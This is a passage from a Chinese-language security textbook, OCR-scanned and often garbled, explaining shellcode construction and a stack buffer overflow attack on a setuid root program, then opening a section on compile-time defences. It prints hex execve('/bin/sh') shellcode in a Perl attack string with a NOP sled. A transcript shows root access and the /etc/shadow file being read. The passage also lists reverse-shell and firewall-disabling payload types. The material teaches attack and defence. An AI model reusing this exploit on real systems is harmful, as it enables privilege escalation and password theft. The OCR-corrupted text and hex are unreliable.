误 信 息 以 外 ， 后 果 是 很 小 的 。 然 而 ， 如 果 它 是 一 个 重要 的 服务 ， 它 的 丢失 在 系统 上 产生 一 个 显 
闭 的 影响 ,就 会 使 用 户 和 管理 员 意 识 到 系统 存在 问题 。 


10.1.3 shellcode 


很 多 缓冲 区 溢出 攻击 的 一 个 基本 部 分 是 程序 的 执行 会 被 转移 到 攻击 者 提供 的 保存 在 发 生 
洲 出 的 缓冲 区 中 的 人 代码。 这些 代码 被 称 为 shellcode， 由 于 通常 它 的 功能 是 将 控制 权 转 移 给 一 
个 用 户 的 命令 行 解释 器 或 者 shell， 因 此 利用 被 攻击 程序 的 特权 可 以 访问 系统 上 任何 可 用 的 程 
序 。 在 UNIX 系统 上 ， 通 过 编译 代码 调用 系统 函数 EXECVE("/bin/sh") 就 可 以 完成 ， 其 中 
用 Bourne shell (或 者 攻击 者 选择 的 其 他 任何 shell) 的 shellcode 来 代替 当前 的 程序 代码 。 在 
Windows 系统 上 上， 通常 包括 一 个 对 图 数 system ("command.exe") ( 较 早 的 系统 是 "cmd.exe") 的 
调用 来 运行 DOS Command shell, shellcode 仅仅 是 指 机 器 代码 ， 是 与 机 天 指 令 和 数据 值 相 对 应 
的 一 串 二 进 制 什 ， 而 这 些 指 令 和 数据 值 能 够 使 攻击 者 实现 期 望 的 功能 。 也 就 是 说 ， 当 shellcode 
需要 在 目标 系统 上 运行 或 者 与 其 系统 晒 数 交互 时 ， 它 依赖 于 特定 的 处 理 需 结构 ， 事 实 上， 通常 
是 依赖 于 特定 的 操作 系统 。 这 也 就 是 缓冲 区 溢出 攻击 总 是 针对 特定 操作 系统 上 运行 的 特定 软 
件 的 一 个 主要 原因 。 因 为 shellcode 是 机 融 代 码 ， 要 编写 它 需 要 熟悉 汇编 语言 和 目标 系统 的 
操作 。 事 实 上 有 很 多 编写 shellcode 的 经 典 的 指导 资料 ， 包 括 最 初 的 文献 [LEVY96]， 都 假定 
读者 具备 这 些 知 识 。 然 而 ， 最 近 很 多 的 站 点 和 工具 已 经 被 开发 出 来 ， 使 得 shellcode 的 开发 
过 程 上 自动 化 了 (就 像 安全 漏洞 开发 一 样 )， 因 而 ， 有 众多 的 潜在 的 用 户 都 在 做 shellcode 攻击 
的 开发 。Metasploit 项 目 就 是 这 样 的 一 个 站 点 ， 其 目标 是 为 进行 渗透 测试 、IDS 特征 码 开发 
和 攻击 研究 的 人 们 提供 有 用 的 信息 ; 站 点 中 还 包括 一 个 高 级 的 开源 平台 ， 用 于 开发 、 测 试 和 
使 用 攻击 代码 ， 使 用 它们 能 够 创建 shellcode 完成 多 种 任务 并 攻击 一 系列 已 知 的 缓冲 区 溢出 
漏洞 。 

shellcode 的 开发 ”为 了 对 shellcode 的 基本 结构 有 更 深 的 认识 ， 我 们 讨论 一 个 简单 经 典 的 
shellcode 攻击 的 开发 ， 它 可 以 简单 地 启动 一 个 Intel Linux 系统 的 Bourne shell。shellcode 需要 
实现 图 10-8a 显示 的 函数 的 功能 ，shellcode 为 系统 函数 EXECVE() 配置 需要 的 参数 ， 包 括 合适 
的 最 少 的 参数 和 环境 列表 ， 并 接着 调用 这 个 函数 。 为 了 要 产生 shellcode， 高 级 程序 语言 规定 必 
须 首 先 编译 成 等 价 的 机 器 语言 。 然 而 ， 接 下 来 必须 要 做 很 多 的 变化 。 首 先 ，EXECVE(sh, args, 
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NULL) E— SPEAR, CREE A A E E E ARE (Linux PE BLA NAT 
器 )， 接 着 触发 一 个 软件 中 断 调用 内 核 完 成 希望 的 系统 调用 。 为 了 在 shellcode 中 使 用 ， 这 些 指 
邻 必须 内 散在 shellcode 中 ， 而 不 依赖 库 函 数 。 

对 shellcode 的 内 容 也 有 几 个 一 般 的 约束 条 件 。 首 先 ， 它 必须 是 浮动 地 址 ( position 
independent)， 这 就 是 说 ， 它 不 能 包含 任何 属于 它 自 己 的 绝对 地 址 ， 因 为 攻击 者 一 般 不 能 预先 
准确 确定 在 函数 的 栈 帧 里 目标 缓冲 区 设置 在 什么 地 方 。 当 目标 程序 里 的 执行 流 有 一 个 函数 调用 
其 他 的 函数 时 ， 这 些 栈 帧 从 栈 的 顶部 开始 回 下 创建 ， 在 其 他 的 栈 帧 之 下 建立 下 一 个 栈 帧 。 帧 的 
编号 和 缓冲 区 最 后 的 存储 单元 依赖 于 通 向 目标 函数 的 函数 调用 的 精确 次 序 。 这 个 六 数 可 能 在 程 
序 中 几 个 不 同 的 地 方 被 调用 ， 可 能 函数 调用 的 次 序 不 同 ， 或 者 在 最 后 被 调用 之 前 使 用 栈 的 临时 
局 部 值 的 数量 不 同 ， 这 样 ， 攻 击 者 对 栈 帧 的 位 置 只 有 一 个 大 概 的 认识 ， 他 一 般 不 能 准确 决定 栈 
帧 的 位 置 。 所 有 这 些 都 意味 着 shellcode 在 内 存 里 的 任何 位 置 都 能 运行 。 这 就 是 说 ， 只 要 使 用 相 
对 地 址 代替 当前 指令 的 地 址 即 可 。 这 也 意味 着 攻击 者 不 能 准确 指定 shellcode 中 指令 的 初始 地 址 。 

shellcode 的 另 一 个 约束 条 件 是 它 不 能 包含 任何 NULL 字符 。 没 有 NULL 才能 保证 全 部 
的 shellcode 能 首先 被 复制 到 缓冲 区 里 。 在 本 章 中 我 们 讨论 的 所 有 缓冲 区 溢出 的 例子 都 涉及 使 
用 了 不 安全 的 字符 串 操作 函数 。 在 C 语言 中 ,一 个 字符 串 末 尾 经 常 有 一 个 NULL， 就 是 说 在 
shellcode 中 能 够 存在 NULL 的 唯一 地 方 是 在 末尾 ， 在 所 有 代码 之 后 ， 这 样 这 个 字符 串 才 能 改 
写 旧 的 帧 指针 ， 和 返回 地 址 的 值 。 

我 们 已 经 给 出 了 上 面 的 约束 条 件 ， 这 个 设计 过 程 产 生 了 类 似 图 10-8b 中 的 代码 。 这 段 代码 
是 在 Pentium 处 理 器 上 使 用 x86 汇编 语言 9 编写 的 。 为 了 帮助 读者 阅读 这 段 代 码 ， 表 10-3 提 
供 了 x86 汇编 语言 的 常用 指令 的 一 个 列表 ， 表 10-4 提供 了 常用 的 一 些 机 器 寄存 器 旺 的 列 
表 。 关 于 x86 汇编 语言 和 机 器 的 组 织 结构 更 多 的 细节 可 以 查阅 文献 [STAL16b]。 一般 而 言 ， 
在 图 10-8b 中 的 代码 实现 了 图 10-8a 中 C 程序 的 功能 。 然 而 ， 为 了 克服 上 面 提 及 的 约束 条 件 ， 
还 有 几 个 特殊 的 问题 需要 解决 。 


表 10-3 一 些 常用 的 x86 汇编 语言 指令 


MOV sre, dest 将 src 的 值 复制 到 dest 

LEA src, dest 将 sre 的 地 址 (装载 的 有 效 地 址 ) 复制 到 dest 
ADD/SUB src, dest 在 sre 中 加 / WKF dest 的 值 

AND/OR/XOR sre, dest src 与 dest 逻辑 与 /或 / 异 或 运算 存 人 src, dest 值 不 变 
CMP vall,val2 比较 vall 和 val2， 将 CPU 的 flag 值 当 作 结 果 
JMP/JZ/INZ addr 跳 转 (无条件 / 如 果 为 零 /如 果 不 为 零 ) 到 addr 
PUSH src 将 sre 的 值 压 人 栈 

POP dest 将 位 于 栈 项 部 的 数值 弹出 到 dest 

CALL addr 在 addr Abdali H eax 

LEAVE 在 退出 函数 之 前 清除 栈 帧 

RET 从 函数 返回 

INT num 软件 中 断 访问 操作 系统 少数 

NOP 不 操作 或 不 执行 任何 指令 


O 编写 x86 汇编 语言 有 两 个 约定 : Intel 和 AT&T。 其 他 不 同 的 处 理 器 在 操作 上 使 用 了 完全 相反 的 次 序 。 本 章 中 
所 有 的 例子 都 使 用 了 AT&T 的 约定 ， 因 为 用 于 建立 这 些 例子 的 GNU GCC 编译 器 工具 接受 AT&T 的 约定 。 

© 目前 这 些 机 器 寄存 器 的 长 度 都 是 32 位 的 。 但 是 如 果 需 要 的 话 ， 可 以 将 一 些 寄存 器 当 作 16 位 寄存 器 (32 位 
中 的 低 16 位 ) 或 者 8 位 寄存 器 (相对 于 16 位 版 本 ) 使 用 。 
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表 10-4 — x86 寄存 器 


32 位 | 16 位 | 8 位 (高 ) | 8 位 ( 低 ) 用 法 

%eax | %ax | %ah | %al | 累加 器 ,用 于 算术 运算 、IO 操作 ， 以 及 执行 中 断 调用 

Yebx 基本 寄存 器 ， 用 于 访问 内 存 ， 传 递 系统 调用 的 参数 和 返回 值 
%ecx 计数 器 寄存 器 

%edx 数据 寄存 器 ， 用 于 算术 操作 、 中 断 调用 和 LO 操作 

%ebp | | | | 栈 帧 基地 址 指针 ， 包含 当 前 的 栈 帧 的 基地 址 

%eip | | | | 指令 指针 或 者 程序 计数 器 ,包含 下 一 条 将 要 执行 的 指令 的 地 址 
%esi | | | | 源 索 引 寄存 器 ， 当 作 一 个 操作 字符 串 或 数组 的 指针 来 使 用 
Yesp | | | A 





0) 编译 过 的 x86 机 器 代码 的 十 六 进 制 什 
图 10-8 UNIX 的 shellcode 示例 


首要 的 问题 是 字符 串 “ /bin/sh ”是 如 何 被 引用 的 。 当 默认 编译 时 ， 这 个 字符 串 是 被 假设 为 
程序 全 局 数据 区 的 一 部 分 被 编译 的 。 但 是 要 想 在 shellcode 中 使 用 ， 这 个 字符 串 就 必须 与 指令 
包含 在 一 起 ,通常 把 它 设置 在 指令 之 后 。 接 着 为 了 引用 这 个 字符 串 ， 代 码 还 必须 确定 它 被 设置 
的 相对 于 当前 指令 地 址 的 地 址 ， 这 可 以 通过 使 用 一 个 新 的 非 标准 的 CALL 指令 实现 。 当 执行 
一 个 CALL 指令 时 ， 它 在 栈 中 随 之 立即 压 入 一 个 内 存 存储 单元 的 地 址 。 当 被 调用 的 函数 返回 
时 ， 这 个 地 址 将 会 作为 返回 地 址 被 正常 地 使 用 。 在 一 个 巧妙 设计 的 攻击 中 ，shellcode 跳 转 到 代 
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码 段 的 末尾 常量 数据 (如 “ /bin/sh”) 之 前 的 一 个 CALL 指令 ， 并 且 在 跳 转 之 后 ， 紧 接着 调用 
返回 到 一 个 存储 单元 。 不 是 用 CALL 指令 压 人 到 栈 的 地 址 作为 返回 地 址 ， 而 是 从 栈 中 弹出 这 
个 地 址 放 到 %esi 寄存 器 中 当 作 和 常量 数据 的 地 址 使 用 。 无 论 代 码 被 设置 在 内 存 中 什么 位 置 ， 这 
种 技术 都 能 成 功 。shellcode 中 使 用 的 其 他 局 部 变量 的 地 址 空间 将 会 随 着 这 个 常量 字符 串 而 被 设 
置 ， 通 过 这 个 相同 的 动态 确定 的 地 址 的 偏 移 量 也 可 以 引用 这 些 局 部 变量 。 

下 一 个 问题 是 确保 shellcode 中 没有 NULL。 这 就 是 说 0 值 不 能 在 任何 指令 参数 或 者 任何 
常量 数据 (例如 ， 字 符 串 “ /bin/sh ”末尾 存储 的 NULL) 中 使 用 。 任 何 0 值 必须 是 在 代码 运行 
时 产生 和 存储 。 一 个 寄存 器 的 值 与 它 自己 进行 逻辑 异 或 运算 (XOR) 可 以 产生 一 个 0 值 ， 在 这 
里 使 用 的 是 寄存 器 %eax。 接 着 这 个 值 能 够 被 复制 到 任何 需要 的 地 方 ， 例 如 这 个 字符 串 的 末尾 ， 
也 可 以 被 当 作 参数 arg[1] 的 值 。 

为 了 解决 不 能 准确 确定 这 个 代码 段 的 初始 地 址 的 问题 ， 攻 击 者 能 够 利用 这 样 一 个 事实 : 代 
码 的 长 度 常常 比 缓冲 区 的 有 效 地 址 空间 (这 个 例子 中 是 40 个 字 节 长 ) 短 很 多 。 通 过 在 缓冲 区 
的 末尾 附近 放置 这 些 代 码 ， 攻 击 者 能 够 用 多 个 NOP 指令 填充 缓冲 区 前 面 的 空间 。 因 为 这 些 指 
令 什 么 也 不 做 ， 攻击 者 能 够 指定 进入 这 段 代码 使 用 的 返回 地 址 ， 作 为 NOP 指令 这 次 运行 的 存 
储 单元 ， 这 被 称 作 一 次 NOP sled。 如 果 指 定 的 地 址 大 约 是 在 NOP sled 的 中 部 ,那么 攻击 者 就 
能 确定 NOP sled 一 半 的 长 度 与 实际 的 缓冲 区 地 址 不 同 ,但 攻击 者 还 是 可 以 成 功 的 。 无 论 实际 
的 目标 地 址 在 NOP sled 中 的 什么 地 方 ， 计 算 机 总 能 通过 维持 NOP 运行 ， 不 做 任何 操作 ， 直 到 
找到 真正 的 shellcode 的 起 始 地 址 。 

在 这 个 背景 之 下 ， 你 现在 能 够 通过 图 10-8b 中 列 出 的 用 汇编 语言 编写 的 shellcode 进行 追 
踪 。 简 单 地 说 ， 这 段 代 码 : 

o 使 用 指令 JMP/CALL 确定 常量 字符 串 的 地 址 。 

e 使 %eax 的 内 容 为 0， 并 复制 这 个 值 到 常量 字符 串 的 末尾 。 

e 在 args[0] 里 保存 那个 字符 串 的 地 址 。 

o 使 args[1] 的 值 为 0。 

e 为 系统 调用 配置 参数 : 

m 系统 调用 execve 的 代码 数目 (11 )。 

m 字符 串 的 地 址 作为 程序 名 被 装载 。 

m 数组 args 的 地 址 作为 参数 列表 。 

m args[1] 的 地 址 ， 因 为 它 是 NULL， 可 作为 ( 空 的 ) 环境 列表 。 

e 产生 一 个 软件 中 断 执行 这 个 系统 调用 (永远 不 返回 )。 

当 这 段 代码 被 汇编 的 时 候 ， 其 机 需 代 码 的 十 六 进 制 形式 如 图 10-8c 所 示 。 其 中 包括 在 前 面 的 一 
对 NOP 指令 (在 需要 的 时 候 为 NOP sled 产生 )， 在 末尾 (因为 NULL 不 能 使 用 ， 当 它 运 行 的 时 
候 代码 将 要 写 人 需要 的 数值 ) 对 局 部 变量 用 ASCII 码 的 空格 代替 了 0 值 。 这 段 shellcode 形成 
了 攻击 字符 串 的 核心 。 为 了 产生 一 些 特殊 的 漏洞 程序 ， 现 在 还 必须 要 对 它 进行 改编 。 | 

一 个 栈 洲 出 攻击 的 示例 ”现在 我 们 已 经 掌握 了 需要 理解 缓冲 区 溢出 的 所 有 的 概念 。 为 了 说 
明 这 样 的 一 个 攻击 是 如 何 实际 执行 的 ， 我 们 使 用 一 个 在 图 10-5a 的 基础 上 改编 的 目标 程序 。 修 
改 以 后 的 程序 缓冲 区 的 长 度 增加 到 64 (为 我 们 的 shellcode 提供 足够 的 空间 )， 没 有 非 缓冲 的 输 
人 (这 样 当 Bourne shell 启动 的 时 候 不 会 丢掉 任何 值 )， 并 且 被 设置 为 setuid root。 这 就 是 说 当 
它 运 行 的 时 候 ， 程 序 是 以 超级 用 户 或 者 系统 管理 员 的 特权 执行 ， 完 全 地 访问 系统 。 这 模拟 了 一 
种 攻击 : 一 个 人 侵 者 像 一 个 正常 的 用 户 一 样 获得 访问 一 些 系 统 的 权限 ， 并 且 和 希望 在 一 个 可 信和 的 
实用 程序 中 利用 一 个 缓冲 区 溢出 ， 以 此 获取 最 大 的 特权 。 

在 一 个 适合 的 、 有 漏洞 的 、 受 信任 的 实用 程序 之 后 ， 攻 击 者 开始 分 析 确 定 栈 中 目标 缓冲 区 
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些 ， 攻 击 者 在 一 个 正在 成 为 目标 的 相同 类 型 的 系统 上 使 用 一 个 调试 硕 运 行 目 标 程序 。 攻 击 者 
可 以 用 很 多 的 随机 输入 使 程序 崩 演 ， 接 着 在 core dump 中 使 用 调试 器 ; 也 可 以 在 调试 器 的 控 
制 下 利用 目标 函数 里 的 一 个 断 点 运行 程序 。 通 过 这 两 种 方式 攻击 者 确定 这 个 也 数 栈 帧 的 一 个 
通常 的 位 置 。 当 我 们 使 用 这 个 程序 示例 去 执行 时 ， 缓冲 区 inp 的 起 始 地 址 为 0xbffffbb0， 当 
前 的 帧 指针 (在 %ebp 里 ) 是 0xbffffc08， 在 这 个 地 址 保存 的 帧 指针 是 0xbffffc38。 这 就 是 说 
要 填 满 缓冲 区 到 达 保 存 的 帧 指针 需要 0x58 或 者 88 个 字 节 。 首 先 允 许 未 尾 少 数 空格 提供 给 数 
组 args， 在 开始 的 时 候 NOP sled 不 断 扩 展 滑行 ， 直 到 准确 使 用 88 个 字 节 ， 新 的 栈 指 针 值 保 
留 原 来 的 0xbffffc38， 目 标的 返回 地 址 值 被 设置 成 0xbffffc08， 这 个 值 在 NOP sled 的 中 间 位 
置 。 下 一 步 必须 有 一 个 新 行 符 结束 这 个 〈 过 长 的 ) 输入 行 ， 该 行将 要 通过 gets) HA. KM 
给 出 了 总 共 97 个 字 节 ， 我 们 再 一 次 使 用 一 个 小 Perl 程序 将 十 六 进 制 表示 的 攻击 字符 串 转换 
成 二 进 制 ， 实 现 这 次 攻击 。 

一 旦 攻击 成 功 ， 攻 击 者 也 必须 指定 命令 并 通过 shell 运行 。 这 些 命 令 必 须 编 写 到 目标 程序 
中 ， 因 为 启动 的 Bourne shell 会 从 相同 的 标准 输入 中 读 取 这 些 内 容 作为 它 的 蔡 代 程序 。 在 这 个 
例子 中 ， 我 们 将 运行 两 个 UNIX 命令 : 

1. whoami 显示 用 户 的 身份 ， 他 的 特权 当前 正在 使 用 。 

2. cat /etc/shadow 显示 隐藏 的 口令 文件 (password file) 的 内 容 ， 这 个 文件 保存 了 用 户 的 加 
密 口 令 ， 仅 超级 用 户 可 以 访问 它 。 

图 10-9 显示 了 这 次 攻击 的 执行 过 程 。 首 先 ， 针 对 目标 程序 buffer4 的 一 个 目录 列表 显示 这 
个 程序 的 所 有 者 是 root 用 户 ， 同 时 它 是 一 个 setuid 程序 。 接 着 当 直 接 运 行 目标 命令 的 时 候 ， 当 
前 的 用 户 被 指定 为 knoppix， 这 个 用 户 没 有 足够 的 特权 访问 隐藏 的 口令 文件 。 接 下 来 显示 了 脚 
本 攻击 的 内 容 ， 它 包含 的 Perl 程序 首先 进行 编码 ， 然 后 输出 shellcode， 接 着 输出 期 望 的 shell 
命令 ， 最 后 ， 看 到 通过 管道 输出 到 目标 程序 里 的 结果 。 读 入 的 输入 行 像 多 个 垃圾 字符 一 样 显 
示 (在 这 个 列表 中 已 经 被 截 得 ， 尽 管 如 此 ， 仍 能 看 到 里 面包 含 字符 串 /bin/sh)。 接 着 从 命令 
whoami 的 输出 显示 ，shell 实际 是 用 root 权限 在 运行 ， 这 就 是 说 隐藏 的 口令 文件 可 以 被 读 取 ， 
正如 我 们 看 到 的 〈 也 已 经 被 截 短 了 ) 那样 。 我 们 可 以 看 到 用 户 root 和 knoppix 的 加 密 口 令 ， 用 
一 个 密码 破解 程序 就 可 以 确定 真正 的 口令 。 我 们 的 攻击 已 经 成 功 获 取 了 目标 系统 上 的 超级 用 户 
权限 ， 利 用 它 能 够 运行 任何 希望 的 命令 。 

这 个 例子 模拟 了 对 系统 上 的 一 个 本 地 漏洞 的 攻击 ， 它 能 够 使 攻击 者 逐步 获取 特权 。 实 际 
上 ， 组 冲 区 很 可 能 很 大 (通常 的 长 度 是 1024B)， 这 就 意味 着 NOP sled 相对 也 很 大 ， 因 此 猜测 
的 目标 地 址 不 需要 准确 。 实 际 上 一 个 目标 工具 也 可 能 使 用 缓冲 的 输入 而 不 是 非 缓 冲 的 输入 ， 这 
就 意味 着 输入 库 孔 数 已 经 提前 读 取 了 一 定数 量 的 字符 ， 超 出 了 程序 请 求 的 范围 。 然 而 ， 当 调用 
PKŠ execve ("/bin/sh") 时 ， 这 个 缓冲 的 输入 已 经 被 丢弃 了 ， 这 样 攻击 者 需要 用 足够 的 空 行 (一 
般 约 1000+ 字符) 填充 输入 发 送 给 程序 ， 所 以 希望 被 执行 的 shell 命令 没有 包含 在 这 些 被 丢弃 
的 缓冲 区 内 容 里 。 这 是 很 容易 完成 的 (只 是 在 Perl 程序 里 有 一 打 或 更 多 的 print 语句 )， 但 是 这 
会 让 这 个 例子 越 来 越 庞 大 ， 缺 乏 清晰 感 。 

目标 程序 不 必 非 得 是 一 个 受信 任 的 系统 工具 ， 也 可 能 是 一 个 提供 网 络 服 务 的 程序 ， 即 网 
络 守护 进程 (network daemon)。 这 些 程序 的 常用 方法 是 监听 来 自 客户 端的 连接 请 求 ， 接 着 产 
生 一 个 子 进程 处 理 这 个 请 求 。 这 个 子 进程 一 般 把 网 络 连接 映射 到 它 的 标准 输入 和 输出 ， 就 像 我 
们 已 经 看 到 的 那样 ， 子 程序 的 代码 可 以 使 用 相同 类 型 的 不 安全 的 输入 或 者 缓冲 区 复制 代码 。 这 
是 1988 4E AS Morris 蠕虫 使 用 的 栈 缓 冲 区 溢出 攻击 的 真实 情形 ， 它 是 以 在 fingerd 中 使 用 函数 
gets() 处 理 UNIX finger 网 络 服务 (在 系统 上 提供 与 用 户 相 关 的 信息 ) 的 请 求 作 为 目标 。 
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$ dir -1 buffer4 s 
—rwsr-xr-x 1 root knoppix 16571 Jul 17 10:49 buffer4 


$ whoami 

knoppix 

$ cat /etc/shadow 

cat: /etc/shadow: Permission denied 


$ cat attackl 

erl -e ‘print pack("H*", 
"90909090909090909090909090909090" . 
"90909090909090909090909090909090" . 
"9090eb1a5e31c08846078d1e895e0889" . 
"460cbO00b89F38d4e088d560ccd80e8e1" . 
"ffffff2f62696e2f7368202020202020" 
"202020202020202038fcffbfc0fbffbf0a") ; 
print "whoami\n"; 
print “cat /etc/shadow\";' 


$ attackl | buffer4 i 

Enter value for name: Hello your yyy)DAOApy is e?°1AFF.../bin/sh.. 
root 

root: Ste as es 4UJT4193RLk1: none 0: 99999:7: 

daemon: *:11453:0:99999:7: : 


nobody: :*:11453:0:99999:7: 
SS FLOPSDKB od yu aKaCHYO TANAYA? 13346:0:99999:7: 





图 10-9 | edit HH Ber as Bil 


另 一 个 可 能 的 目标 是 处 理 常 用 文档 格式 〈 例 如 ， 使 用 库 例 程 解码 并 显示 GIF 或 者 JPEG 图 
像 ) 的 程序 或 者 库 代 码 。 在 这 种 情形 下 ， 输 入 不 是 来 自 于 一 个 终端 或 者 网 络 连接 ， 而 是 来 自 于 
被 解码 和 显示 的 文件 。 如 果 这 些 代 码 包 含 缓冲 区 溢出 ， 当 读 取 文件 内 容 的 时 候 ， 在 一 个 特殊 
的 被 破坏 的 图 像 里 进行 解码 能 够 触发 缓冲 区 溢出 。 这 种 攻击 文件 可 能 经 由 电子 邮件 、 即 时 信 
息 或 者 作为 Web 页 的 一 部 分 进行 散布 。 因 为 攻击 者 不 是 直接 与 目标 程序 和 系统 进行 交互 ， 故 
shellcode 通常 打开 一 个 网 络 连 接 ， 并 退回 到 一 个 攻击 者 控制 的 系统 ， 返 回信 息 并 可 能 接收 额外 
的 命令 来 执行 。 所 有 这 些 都 表明 在 许多 类 型 的 程序 中 都 能 发 现 缓冲 区 溢出 ， 它 们 人 处理 一 系列 不 
同 的 输入 ， 并 产生 各 种 可 能 的 啊 应 。 

上 述 描述 说 明 在 栈 溢出 攻击 中 进行 shellcode 开发 和 配置 是 很 简单 的 。 除 了 启动 一 个 命令 
行 (UNIX 或 者 DOS) shell 以 外 ,攻击 者 还 可 能 企图 让 其 shellcode 完成 一 些 更 复杂 的 操作 ， 正 如 
在 已 经 讨论 过 的 情况 下 指出 的 那样 。Metasploit 项 目 站 点 包含 了 能 够 产生 的 shellcode 的 一 系列 
功能 ， 口 袋 风 暴 (Packet Storm)Web 站 点 包含 了 很 多 已 打包 的 shellcode， 这 些 包含 的 代码 能 够 : 
被 连接 的 时 候 建立 一 个 侦 听 服务 启动 一 个 远程 shell。 
建立 一 个 相反 的 shell， 反 向 连接 到 黑客 系统 。 
使 用 本 地 攻击 ， 创 建 一 个 shell 或 者 execve 一 个 进程 。 
废除 当前 阻止 其 他 攻击 的 防火 墙 规则 (例如 IPTables 和 IPChains)。 
o 摆脱 chrooted (限制 执行 ) 的 环境 ， 对 系统 进行 完全 访问 。 
在 各 种 平台 上 就 一 系列 可 能 的 结果 编写 shellcode 过 程 的 更 多 细节 能 够 在 [ANLE07] 中 找到 。 


10.2 ”针对 缓冲 区 溢出 的 防御 


我 们 已 经 看 到 ， 发 现 和 利用 栈 缓冲 区 汶 出 进行 攻击 并 不 困难 。 在 过 去 的 几 十 年 中 ， 相 当 多 
的 漏洞 攻击 程序 已 经 有 力 地 说 明了 这 一 点 。 针 对 这 些 攻击 ,我 们 有 了 防护 系统 的 需求 ， 我 们 希 
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望 能 够 预防 它们 发 生 ， 或 者 至 少 也 可 以 检测 到 和 终止 它们 。 这 一 节 我 们 讨论 一 些 可 能 的 方法 实 
现 对 系统 的 保护 ， 这 些 方法 大 致 可 以 划分 为 两 类 : 

e 编译 时 防御 ， 目 标 是 加 固 程 序 来 抵抗 在 新 程序 中 的 攻击 。 

e 运行 时 防御 ， 目 标 是 在 现 有 的 程序 中 检测 和 终止 攻击 。 

尽管 在 过 去 的 20 多 年 里 ， 人 们 已 经 发 现 了 很 多 合适 的 防御 措施 ， 然 而 许多 软件 和 系统 存 
在 漏洞 的 事实 阻碍 了 这 些 防御 措施 的 施行 。 因 此 ， 运 行 时 防御 如 今 更 受 青 睐 ， 因 为 其 能 够 在 操 
作 系 统 和 升级 系统 中 进行 配置 ， 从 而 对 存在 漏洞 的 程序 提供 保护 。 这 方面 大 多 数 的 技术 可 以 参 
考 [LHEE03]。 


10.2.1 编译 时 防御 


编译 时 防御 ， 是 指 在 进行 编译 的 时 候 通 过 检测 程序 防止 或 侦 测 缓冲 区 溢出 。 完 成 该 防御 
的 方法 有 选择 一 种 不 允许 缓冲 区 溢出 的 高 级 语言 ， 鼓 励 使 用 安全 的 编码 标准 ， 使 用 安全 的 标准 
E, 或 者 包含 用 来 检测 栈 帧 是 否 被 破坏 的 附加 代码 。 

程序 设计 语言 的 选择 ”如 前 所 述 ， 一 个 选择 是 使 用 一 种 现代 高 级 程序 语言 编写 程序 ， 它 对 
变量 类 型 和 在 其 上 可 进行 的 操作 有 较 强 的 概念 。 这 样 的 语言 不 容易 受到 绥 冲 区 溢出 的 攻击 ， 因 
为 它们 的 编译 器 包含 附加 的 代码 自动 加 强 范围 检查 ， 不 需要 程序 员 在 编码 中 进行 明确 的 说 明 . 
这 些 语言 提供 的 灵活 性 和 安全 性 需要 在 资源 使 用 上 会 付出 代价 ， 在 编译 和 运行 时 必须 执行 的 附 
加 代码 会 对 缓冲 区 限制 进行 检查 。 由 于 处 理 需 性 能 的 快速 增长 ， 这 些 不 利 条 件 变 得 越 来 越 不 重 
要 。 越 来 越 多 的 程序 使 用 这 些 语言 进行 编写 ， 因 此 这 些 程序 代码 对 缓冲 区 溢出 具有 免疫 能 力 
(但 是 如 果 它 们 在 缺乏 安全 机 制 的 语言 里 使 用 已 有 的 系统 库 ， 或 者 进行 运行 时 执行 环境 的 编写 ， 
它们 还 是 容易 受到 攻击 的 )。 我 们 也 注意 到 ， 距 离 底 层 的 机 絮语 言 和 结构 越 远 ， 就 意味 着 访问 
一 些 指 令 和 硬件 资源 越 不 可 能 。 这 就 限制 了 在 编写 代码 时 它们 的 有 效 性 ， 例 如 ， 编 写 设备 驱动 
程序 ， 必 须 与 这 些 底层 资源 进行 交互 。 由 于 这 些 原 因 ， 仍 然 可 能 至 少 有 一 些 代码 需要 使 用 缺乏 
安全 机 制 的 语言 来 编写 ， 例 如 C 语言 。 

安全 的 编码 技术 “如果 使 用 像 C 语言 一 类 的 语言 ， 程 序 员 必须 意识 到 处 理 指 针 地 址 以 及 
直接 访问 内 存 需 要 付出 一 定 的 代价 。 我 们 已 经 注意 到 ，C 语言 是 作为 系统 编程 语言 被 设计 的 ， 
它 运 行 在 比 我 们 现在 使 用 的 小 得 多 且 受 限 得 多 的 系统 上 。 这 就 意味 着 ， 与 类 型 安全 相 比 ，C 语 
言 的 设计 者 更 多 地 强调 空间 的 效率 和 性 能 ， 设 计 者 们 假设 程序 员 在 使 用 这 些 语言 编写 代码 时 是 
非常 细心 的 ， 他 们 有 责任 确保 所 有 数据 结构 和 变量 的 安全 使 用 。 

不 幸 的 是 ， 正 如 几 十 年 的 经 历 表 明 的 那样 ， 实 际 的 情况 并 不 是 这 样 。 由 于 UNIX 操作 系 
统 、Linux 操作 系统 和 应 用 程序 中 庞大 的 继承 代码 体 包含 潜在 的 不 安全 代码 ， 因 此 它们 很 容易 
受到 缓冲 区 溢出 的 攻击 。 

为 了 加 固 这 些 系 统 ， 程 序 员 必 须 检查 代码 ， 以 一 种 安全 的 方式 重新 编写 任何 不 安全 的 代 
码 。 对 缓冲 区 洲 出 的 攻击 要 给 予 快速 的 反击 ， 在 某 种 程度 上 这 个 进程 已 经 开始 。OpenBSD 项 
目 是 一 个 很 好 的 典范 ， 它 产生 了 一 个 自由 的 多 平台 的 基于 4.4BSD 的 类 UNIX ( UNIX-like) 操 
作 系 统 。 在 这 个 系统 中 其 他 技术 改变 了 了， 程序 员 对 已 有 的 代码 基底 (code base) 进行 了 广泛 的 
审计 ， 这 些 代 码 包 括 操作 系统 、 标 准 库 和 常用 工具 。 这 使 得 人 们 普遍 认为 该 操作 系统 是 广泛 使 
用 的 最 安全 的 操作 系统 。2016 年 的 OpenBSD 项 目标 语 声称 ， 在 很 长 一 段 时 间 内 ， 他 们 的 默认 
安装 系统 中 只 有 两 个 远程 漏洞 。 这 是 一 个 让 人 凌 莫 的 记录 。 微 软 的 程序 员 也 承担 了 一 个 主要 的 
项 目 ， 审 查 他 们 的 代码 基底 。 其 部 分 目的 是 对 大 量 漏洞 引起 的 不 断 恶 化 的 宣传 进行 回应 。 这 些 
漏洞 包括 在 其 操作 系统 和 应 用 代码 中 发 现 的 很 多 缓冲 区 溢出 问题 ， 这 显然 是 一 个 困难 的 过 程 ， 
尽管 他 们 声称 Vista 及 后 续 的 Windows 操作 系统 将 会 从 这 个 过 程 中 大 为 受益 。 
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关于 为 了 完成 他 们 自己 的 程序 而 继续 编写 程序 代码 的 程序 员 ， 保 证 不 发 生 缓冲 区 溢出 需要 
的 训练 ， 是 我 们 在 第 1 章 讨论 的 各 种 安全 程序 设计 技术 的 一 部 分 。 更 明确 地 说 ， 这 意味 着 一 
